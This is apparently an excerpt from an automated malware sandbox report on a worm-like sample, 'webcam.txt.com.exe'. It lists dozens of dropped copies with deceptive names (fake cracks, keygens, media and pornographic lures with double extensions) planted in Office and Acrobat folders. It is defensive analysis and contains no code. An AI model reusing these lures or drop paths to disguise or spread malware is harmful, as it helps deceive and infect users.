Source: Cracks & Warez Archive.exe0.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe0.0.drStatic PE information: section name: .petite
Source: Cracks & Warez Archive.exe0.0.drStatic PE information: section name:
Source: Star Office 8.exe1.0.drStatic PE information: section name:
Source: Star Office 8.exe1.0.drStatic PE information: section name: .petite
Source: Star Office 8.exe1.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe0.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe0.0.drStatic PE information: section name: .petite
Source: Visual Studio Net Crack.exe0.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe1.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe1.0.drStatic PE information: section name: .petite
Source: Partitionsmagic 9.0.exe1.0.drStatic PE information: section name:
Source: ACDSee 9.exe0.0.drStatic PE information: section name:
Source: ACDSee 9.exe0.0.drStatic PE information: section name: .petite
Source: ACDSee 9.exe0.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe1.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe1.0.drStatic PE information: section name: .petite
Source: Gimp 1.5 Full with Key.exe1.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe0.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe0.0.drStatic PE information: section name: .petite
Source: MS Service Pack 5.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe2.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe2.0.drStatic PE information: section name: .petite
Source: Norton Antivirus 2004.exe2.0.drStatic PE information: section name:
Source: Clone DVD 5.exe0.0.drStatic PE information: section name:
Source: Clone DVD 5.exe0.0.drStatic PE information: section name: .petite
Source: Clone DVD 5.exe0.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe2.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe2.0.drStatic PE information: section name: .petite
Source: Windows Sourcecode.doc.exe2.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe.0.drStatic PE information: section name: .petite
Source: WinAmp 12 full.exe.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe.0.drStatic PE information: section name: .petite
Source: DivX 7.0 final.exe.0.drStatic PE information: section name:
Source: Ulead Keygen.exe.0.drStatic PE information: section name:
Source: Ulead Keygen.exe.0.drStatic PE information: section name: .petite
Source: Ulead Keygen.exe.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe1.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe1.0.drStatic PE information: section name: .petite
Source: Cracks & Warez Archive.exe1.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe.0.drStatic PE information: section name: .petite
Source: Smashing the stack.rtf.exe.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe1.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe1.0.drStatic PE information: section name: .petite
Source: Visual Studio Net Crack.exe1.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe.0.drStatic PE information: section name: .petite
Source: IE58.1 full setup.exe.0.drStatic PE information: section name:
Source: ACDSee 9.exe1.0.drStatic PE information: section name:
Source: ACDSee 9.exe1.0.drStatic PE information: section name: .petite
Source: ACDSee 9.exe1.0.drStatic PE information: section name:
Source: Opera.exe0.0.drStatic PE information: section name:
Source: Opera.exe0.0.drStatic PE information: section name: .petite
Source: Opera.exe0.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe1.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe1.0.drStatic PE information: section name: .petite
Source: MS Service Pack 5.exe1.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe0.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe0.0.drStatic PE information: section name: .petite
Source: DivX 7.0 final.exe0.0.drStatic PE information: section name:
Source: Clone DVD 5.exe1.0.drStatic PE information: section name:
Source: Clone DVD 5.exe1.0.drStatic PE information: section name: .petite
Source: Clone DVD 5.exe1.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe0.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe0.0.drStatic PE information: section name: .petite
Source: WinAmp 12 full.exe0.0.drStatic PE information: section name:
Source: Ulead Keygen.exe0.0.drStatic PE information: section name:
Source: Ulead Keygen.exe0.0.drStatic PE information: section name: .petite
Source: Ulead Keygen.exe0.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe1.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe1.0.drStatic PE information: section name: .petite
Source: Adobe Premiere 9.exe1.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe0.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe0.0.drStatic PE information: section name: .petite
Source: Smashing the stack.rtf.exe0.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif1.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif1.0.drStatic PE information: section name: .petite
Source: Teen Porn 16.jpg.pif1.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe0.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe0.0.drStatic PE information: section name: .petite
Source: IE58.1 full setup.exe0.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe1.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe1.0.drStatic PE information: section name: .petite
Source: Microsoft WinXP Crack.exe1.0.drStatic PE information: section name:
Source: Opera.exe1.0.drStatic PE information: section name:
Source: Opera.exe1.0.drStatic PE information: section name: .petite
Source: Opera.exe1.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe0.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe0.0.drStatic PE information: section name: .petite
Source: The Sims 3 crack.exe0.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe1.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe1.0.drStatic PE information: section name: .petite
Source: The Sims 3 crack.exe1.0.drStatic PE information: section name:
Source: Serials.txt.exe3.0.drStatic PE information: section name:
Source: Serials.txt.exe3.0.drStatic PE information: section name: .petite
Source: Serials.txt.exe3.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe2.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe2.0.drStatic PE information: section name: .petite
Source: Microsoft WinXP Crack.exe2.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe1.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe1.0.drStatic PE information: section name: .petite
Source: DivX 7.0 final.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe0.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe0.0.drStatic PE information: section name: .petite
Source: Lightwave SE Update.exe0.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe1.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe1.0.drStatic PE information: section name: .petite
Source: WinAmp 12 full.exe1.0.drStatic PE information: section name:
Source: Dark Angels.pif1.0.drStatic PE information: section name:
Source: Dark Angels.pif1.0.drStatic PE information: section name: .petite
Source: Dark Angels.pif1.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe2.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe2.0.drStatic PE information: section name: .petite
Source: Adobe Premiere 9.exe2.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe1.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe1.0.drStatic PE information: section name: .petite
Source: Smashing the stack.rtf.exe1.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif2.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif2.0.drStatic PE information: section name: .petite
Source: Teen Porn 16.jpg.pif2.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe3.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe3.0.drStatic PE information: section name: .petite
Source: Microsoft Office 2003 Crack.exe3.0.drStatic PE information: section name:
Source: Ulead Keygen.exe1.0.drStatic PE information: section name:
Source: Ulead Keygen.exe1.0.drStatic PE information: section name: .petite
Source: Ulead Keygen.exe1.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe1.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe1.0.drStatic PE information: section name: .petite
Source: XXX hardcore pic.jpg.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe1.0.drStatic PE information: section name: .petite
Source: Lightwave SE Update.exe1.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe1.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe1.0.drStatic PE information: section name: .petite
Source: Adobe Photoshop 9 full.exe1.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe3.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe3.0.drStatic PE information: section name: .petite
Source: Adobe Premiere 9.exe3.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif3.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif3.0.drStatic PE information: section name: .petite
Source: Teen Porn 16.jpg.pif3.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe3.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe3.0.drStatic PE information: section name: .petite
Source: Microsoft WinXP Crack.exe3.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe2.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe2.0.drStatic PE information: section name: .petite
Source: The Sims 3 crack.exe2.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe2.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe2.0.drStatic PE information: section name: .petite
Source: Lightwave SE Update.exe2.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe2.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe2.0.drStatic PE information: section name: .petite
Source: Adobe Photoshop 9 full.exe2.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif4.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif4.0.drStatic PE information: section name: .petite
Source: Teen Porn 16.jpg.pif4.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe2.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe2.0.drStatic PE information: section name: .petite
Source: XXX hardcore pic.jpg.exe2.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe4.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe4.0.drStatic PE information: section name: .petite
Source: Adobe Premiere 9.exe4.0.drStatic PE information: section name:
Source: Dark Angels.pif2.0.drStatic PE information: section name:
Source: Dark Angels.pif2.0.drStatic PE information: section name: .petite
Source: Dark Angels.pif2.0.drStatic PE information: section name:
Source: Full album.mp3.pif3.0.drStatic PE information: section name:
Source: Full album.mp3.pif3.0.drStatic PE information: section name: .petite
Source: Full album.mp3.pif3.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe3.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe3.0.drStatic PE information: section name: .petite
Source: Adobe Photoshop 9 full.exe3.0.drStatic PE information: section name:
Source: Serials.txt.exe4.0.drStatic PE information: section name:
Source: Serials.txt.exe4.0.drStatic PE information: section name: .petite
Source: Serials.txt.exe4.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe4.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe4.0.drStatic PE information: section name: .petite
Source: Microsoft Office 2003 Crack.exe4.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe3.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe3.0.drStatic PE information: section name: .petite
Source: Ahead Nero 7.exe3.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe5.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe5.0.drStatic PE information: section name: .petite
Source: Microsoft Office 2003 Crack.exe5.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe3.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe3.0.drStatic PE information: section name: .petite
Source: XXX hardcore pic.jpg.exe3.0.drStatic PE information: section name:
Source: Dark Angels.pif3.0.drStatic PE information: section name:
Source: Dark Angels.pif3.0.drStatic PE information: section name: .petite
Source: Dark Angels.pif3.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe3.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe3.0.drStatic PE information: section name: .petite
Source: The Sims 3 crack.exe3.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe1.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe1.0.drStatic PE information: section name: .petite
Source: IE58.1 full setup.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe3.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe3.0.drStatic PE information: section name: .petite
Source: Lightwave SE Update.exe3.0.drStatic PE information: section name:
Source: Opera.exe2.0.drStatic PE information: section name:
Source: Opera.exe2.0.drStatic PE information: section name: .petite
Source: Opera.exe2.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe4.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe4.0.drStatic PE information: section name: .petite
Source: Adobe Photoshop 9 full.exe4.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe2.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe2.0.drStatic PE information: section name: .petite
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004037D0 push eax; ret 0_2_004037FE
Source: C:\Windows\winlogon.exeCode function: 1_2_004037D0 push eax; ret 1_2_004037FE
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366
Source: initial sampleStatic PE information: section name: entropy: 7.930690770928366

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Virii Sourcecode.scrJump to dropped file
